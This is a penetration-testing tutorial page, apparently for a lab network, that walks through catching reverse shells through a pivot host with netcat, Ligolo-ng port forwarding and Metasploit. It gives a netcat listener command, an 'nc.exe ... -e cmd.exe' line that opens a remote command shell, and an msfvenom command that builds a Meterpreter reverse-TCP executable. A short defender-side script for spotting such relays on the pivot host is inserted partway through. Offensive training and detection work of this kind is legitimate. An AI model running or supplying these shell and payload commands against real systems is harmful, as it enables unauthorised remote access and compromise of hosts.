# Setup Reverse Shells through Pivot

Here's how you can set up a netcat listener and pivot connections using **Netcat** and **Metasploit**:

***

#### **Step 1: Set Up the Netcat Listener**

First, you need to set up a **Netcat** listener on your local machine (Kali) to accept incoming connections.

1. **Start Netcat Listener**:

   ```bash
   nc -nvlp 2222
   ```

   This command will listen on **port 2222** on your local machine.

***

#### **Step 2: Set Up the Listener Add Command**

Now, in the Ligolo-ng session, add a listener on the pivot machine that forwards any incoming connections on a different port (e.g., port 1234) to port 2222 on your local machine.

1. **Listener Add Command**:

   ```bash
   listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:2222
   ```

   * This command tells the listener to forward any incoming connections that hit **port 1234** on your **pivot machine** to your **localhost (127.0.0.1)** on **port 2222**.

   You should see a message confirming the listener is set up and active.

***

#### **Step 3: Verify the Listener is Active**

You can check if the listener is active by running the following command:

1. **Check Active Listeners**:

   ```bash
   listener_list
   ```

   This will show you the listeners that are currently active. You should see the listener set up in the previous step.

***

#### **Step 4: Testing the Listener with Netcat**

Now, to test that the listener works, you can attempt a connection from a remote machine (e.g., **client01**) using **Netcat**:

1. **Connect Back to the Listener on Your Pivot Machine**: On the remote machine (**client01**), use the following Netcat command to connect to the pivot machine on **port 1234**, which forwards the traffic to **localhost:2222** on your machine.

   ```bash
   nc.exe -nv 10.10.120.131 1234 -e cmd.exe
   ```

   * `10.10.120.131` is the IP address of your pivot machine.
   * Port `1234` is the pivot machine's listening port; traffic arriving there is forwarded to **localhost:2222**.
   * The `-e cmd.exe` option executes **cmd.exe** on the target machine, providing you with a shell.
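From the defender's side, the forwarding set up in Steps 2 to 4 leaves a recognisable footprint on the pivot host: a wildcard-bound listener outside the host's baseline, whose owning process also holds an outbound connection. The following is an added detection sketch, not part of the original page; the `netstat -ano` sample, the PIDs, the client address `10.10.120.50`, the upstream address `203.0.113.7:443` and the baseline port set are all constructed, and it assumes the forwarding process owns both the listener and its upstream connection.

```python
import re

# Constructed `netstat -ano` output from the pivot host (not real capture data).
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1234           0.0.0.0:0              LISTENING       5120
  TCP    10.10.120.131:1234     10.10.120.50:49811     ESTABLISHED     5120
  TCP    10.10.120.131:50122    203.0.113.7:443        ESTABLISHED     5120
  TCP    10.10.120.131:445      10.10.120.50:49790     ESTABLISHED     4
"""

BASELINE_PORTS = {135, 445}  # assumed set of approved listeners for this host

ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$")


def parse(text):
    """Yield (local_ip, local_port, remote_ip, remote_port, state, pid) per TCP row."""
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            lip, lport, rip, rport, state, pid = m.groups()
            yield lip, int(lport), rip, int(rport), state, int(pid)


def find_relay_candidates(text, baseline):
    """Flag wildcard listeners outside the baseline and describe their traffic."""
    rows = list(parse(text))
    findings = []
    for lip, lport, _, _, state, pid in rows:
        if state != "LISTENING" or lip != "0.0.0.0" or lport in baseline:
            continue
        # Established connections owned by the same process as the listener.
        est = [r for r in rows if r[4] == "ESTABLISHED" and r[5] == pid]
        # Peers connected to the listening port are clients of the forwarder.
        clients = sorted({r[2] for r in est if r[1] == lport})
        # Connections from any other local port are treated as upstream (heuristic).
        upstream = sorted({f"{r[2]}:{r[3]}" for r in est if r[1] != lport})
        findings.append({"port": lport, "pid": pid, "clients": clients,
                         "upstream": upstream,
                         "relay_like": bool(clients and upstream)})
    return findings


if __name__ == "__main__":
    for finding in find_relay_candidates(SAMPLE_NETSTAT, BASELINE_PORTS):
        print(finding)
```

A `relay_like` finding is a lead, not a verdict: map the PID to its executable and parent process before acting on it.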

***

#### **Step 5: Using Metasploit for Reverse Shell**

To automate this process or use a reverse shell, you can use **Metasploit** to generate a payload that will connect back to your pivot machine's IP.

1. **Generate a Reverse Shell with Metasploit**:

   ```bash
   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.76.14 LPORT=1234 -f exe -o shell2.exe
   ```

   * `LHOST=172.16.76.14` is the IP address of your pivot machine.
   * `LPORT=1234` is the port on the pivot machine from which traffic is forwarded.
   * `-o shell2.exe` specifies the output filename.
2. **Execute the Payload**: After transferring and executing **shell2.exe** on the target machine, it will establish a reverse shell connection back to your listener on **port 1234**, which is forwarded to **localhost:2222**.

***

